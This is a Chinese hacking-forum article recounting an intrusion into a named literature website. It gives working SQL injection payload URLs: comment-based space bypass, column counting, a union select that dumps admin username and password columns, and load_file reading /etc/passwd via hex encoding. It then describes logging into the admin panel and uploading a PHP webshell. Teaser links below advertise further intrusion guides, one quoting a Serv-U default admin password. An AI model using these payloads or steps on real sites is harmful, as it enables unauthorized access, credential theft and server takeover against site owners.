对纵横时空文学站的一次安全检测

所属分类: 网络安全 / 黑客入侵 阅读数: 180
收藏 0 赞 0 分享
纵横时空文学站地址为http://xxx.ouou.com/,是ouou网站下属的一个文学小说的网站。 界面做的非常漂亮. 初步看了下为PHP MYSQL的架构PHP版本为PHP/5.1.4-0.1. 。WEBSERVER使用的是Apache/2.0.55 基于以上几点应该大概能判断出服务器应该是使用的UNIX . 这种架构应该为典型的P M U的架构了 也就是PHP MYSQL UNIX 。 可能有读者会问了 ? 你怎么知道他的Apache跟MYSQL的版本呢? 其实这个很简单。 在WEB随便输入一个不存在的页面 看下暴错信息就OK了。 如图1



看到图1我们了解了网站的大概情况 首先就来查找注射漏洞。 随便打开一个带有参数的连接 地址为http://xzx.ouou.com/newslook.php?id=29 输入一个单引号检测, 成功返回错误信息, 并且暴出了WEB绝对路径,如图2



错误信息如下:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /data/webroot/zh/newslook.php on line 264

通过错误信息得知WEB路径为/data/webroot/zh/newslook.php通过路径可以肯定服务器为UNIX

继续使用and 1=1 1=2来判断是不是真的存在注射漏洞

http://xx.ouou.com/newslook.php?id=29【/**/and/**/1=1】/**/and/**/1=1 作用与我们在ASP注射中的 and 1=1的效果是一样的,因为有些站会过滤■空格,/**/是替代空格的。返回正常

继续http://xx.ouou.com/newslook.php?id=29【/**/and/**/1=2】

返回错误, 现在可以肯定http://xx.ouou.com/newslook.php?id=29 这个地址存在注射漏洞。

既然存在漏洞,我们就来通过注射点来查找到管理员的密码从而登陆后台来取得WEBSHELL。 现在来爆一下他的有多少个字段。

使用/**/order/**/by/**/10 来判断他的字段是不是小于10

http://XX.ouou.com/newslook.php?id=29【/**/order/**/by/**/10】 如图3



如图得知我们执行/**/order/**/by/**/10 页面返回错误 说明字段是小于10的 我们继续执行

http://ouou.com/newslook.php?id=29【/**/order/**/by/**/9】

http://ouou.com/newslook.php?id=29【/**/order/**/by/**/8】

http://ouou.com/newslook.php?id=29【/**/order/**/by/**/7】

http://ouou.com/newslook.php?id=29【/**/order/**/by/**/6】

http://.ouou.com/newslook.php?id=29【/**/order/**/by/**/5】

http://ouou.com/newslook.php?id=29【/**/order/**/by/**/4】

直到执行/**/order/**/by/**/4的时候页面返回正常 如图4



我们看到当执行/**/order/**/by/**/4到4的时候返回正常说明存在4个字段。 因为我们在前面已经得到MYSQL的版本 所以已经不用判断就知道是支持union联合查询的、

继续猜解密码

http://xx.ouou.com/newslook.php?id=29/**/and/**/1=2/**/union/**/select/**/1,2,3,4

返回出几个数字,一会帐号密码会从显示出来 :)

我们来爆字段名,经过一段时间的猜解最终确定表为admin

http://xx.ouou.com/newslook.php?id=29/**/and/**/1=2/**/union/**/select/**/1,2,3,4/**/from/**/admin 如图5


因为返回正常说明存在该表,返回错误则不存在。 经过半天的猜解解,确定列名为“pas”“us”“id”,把相应的列名对应上面的相应的数字,数字部分就会出现我们想要的的东西了。语句是这样的,上面显示的数字为2、3我们这里替换2、3为“pas”和“us”
id=29/**/and/**/1=2/**/union/**/select/**/1,pas,us,4/**/from/**/admin,这样在2、3部分就会出现帐号和密码了。

另外PHP注射如果在权限够的情况下是可以读到目标网站的的源文件,可以去读一些类似CONN的文件取得敏感信息。现在来判断下这个注射点有没有权限读文件

http://.ouou.com/newslook.php?id=29【/**/and/**/(select/**/count(*)/**/from/**/mysql.user)>0 /*】如图6



返回正常说明有权限读文件,现在可以调用load_file的函数来读文件了,还记刚才【’】爆出的绝对路径吧。直接读就可以了,不过要把路径转换成hex编码,为什么呢?因为某些字符在url会被转意比如\会被转意成/,既然试UNIX主机尝试读一下/etc/passwd 继续http://XX.ouou.com/newslook.php?id=29【/**/and/**/1=2/**/union/**/select/**/1,2,load_file(0x2F6574632F706173737764),4】

load_file(0x2F6574632F706173737764)替换3的位置,如果可以读3的位置会出现文件内容,如图7



看到了吧,可以读出来:)。【0x2F6574632F706173737764】是/etc/passwd的hex编码,接下来就是要去网站源文件然后去顶部找调用数据库的文件然后再读数据库文件找到mysql密码,这个我就不说了,因为我已经得到了 admin的密码 并且知道后台为http://XXouou.com/admin 直接登陆后台先拿个WEBSHELL再说 如图8



登陆后台发现权限非常大,可以直接看到跟目录的文件,并且我们看到“重命名”“编辑”“删除”等字样。 但是这里并不可以利用,因为一编辑就会提示你输入另一个密码。 另外我发现网站后台使用了FCKeditor编辑器。并且可以成功上传一个asa的文件。但是我们知道apache 是不解吸ASP文件的。所以就没有办法,只能寻找可以上传PHP的地方。

记的刚登陆后台后台的时候看到跟目录那里有个上传目录,尝试上传一个PHP发现提示更新成功,马上访问发现存在那个PHP文件。如图9





图10

至此我们已经成功的拿到了WEBSHELL 并且也找到了MYSQL密码。 发现WEBSHELL的权限非常大,至于提权就不需要了。马上通知朋友修补漏洞咯。
更多精彩内容其他人还在看

对有防火墙主机的入侵渗透

一、踩点 ping [url=http://www.xxx.com]www.xxx.com[/url] 发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。 二、注入 从源文件里搜索关键字asp,
收藏 0 赞 0 分享

浅谈入侵UNIX

一:基本知识 1:常见UNIX版本: SCO UNIX,Sunos,Solaris,HP-UX,Digtal,Unix,IRIX,AIX,Linux,FreeBSD, 386BSD,A/UX,BSD,BSD-LITE,Goherent,Dynix,Hurd(GNN)
收藏 0 赞 0 分享

全方位了解黑客如何入侵NT系统

现在的企业当中一般都是使用的NT系统,也不得不承认,NT系统的确是非常适合企业使用的操作系统,然而“黑客”的攻击引来了企业信息安全危机…… 得到了NT的管理员密码还能做什么,还不是想做什么就做什么呗。但到底能做什么呢?能详
收藏 0 赞 0 分享

入侵Oracle数据库时常用的操作命令整理

本文按步骤讲解如何入侵Oracle数据库时常用的操作命令整理。 1、su–Oracle不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。 2、sqlplus /nolog 或sqlplus system/manager 或./sq
收藏 0 赞 0 分享

通杀动易2005的 XSS 攻击

动易2005里面,留言的时候存在一个XSS。 攻击方法如下 : 首先在网站注册一个普通会员,然后去GUESTBOOK留言,在插入图片的时候地址写上(建议在原代码里面把图片的高度与宽度都设置成0,这样在图片前面加上这个连接,基本上就看不见图片了,图片的连接却被管理员解吸
收藏 0 赞 0 分享

Serv-u6.0提权新招

适用环境:服务器禁用FSO,关掉Wscript.shelll,没有执行权限。 限制:没有更改管理员的密码,或者破解出了Serv-U的管理员的密码。Serv-U默认用户名:localadministrator 密码:#|@$ak#.|k;0@p 下面用MSWins
收藏 0 赞 0 分享

DNS(域名服务器)欺骗技术

概述:什么是DNS欺骗? DNS欺骗是一门改变DNS原始指向IP的艺术。为了更好的理解,让我们先来看一个例子。如果你想用浏览器去google搜索一些信息,毫无疑问的你会在地址栏里输入www.google.com的网址然后回车。 那么在这背后又有什么事情正在进行着呢?一般而
收藏 0 赞 0 分享

用“电驴”抓肉鸡

我用“电驴”抓肉鸡!!难道是放一个“电驴”在路上,等“火鸡”过来,一不小心踩在“电驴”上结果给烫熟了,结果就成“肉鸡”了。很多朋友说抓肉鸡很难,找好肉鸡就更难,
收藏 0 赞 0 分享

轻松学会入侵网络服务器

尽管为服务器设计软件的软件工程师们想方设法提高系统的安全性,然而由于系统管理员的水平参差不齐或安全意识底下,往往给黑客提供了入侵的机会。   其实每一个黑客都有自己独到的方法。笔者对于入侵网站服务器的资料收集了很多,但是因为实际情况的不同,往往
收藏 0 赞 0 分享

139/445端口与入侵win 2000主机

SMB(Server Message Block),Windows协议族,用于文件和打印共享服务。在Win9X/NT中SMB基于NBT实现,NBT(NetBIOS over TCP/IP)使用137, 138 (UDP) and 139 (TCP)来实现基于TCP/IP的NETB
收藏 0 赞 0 分享
查看更多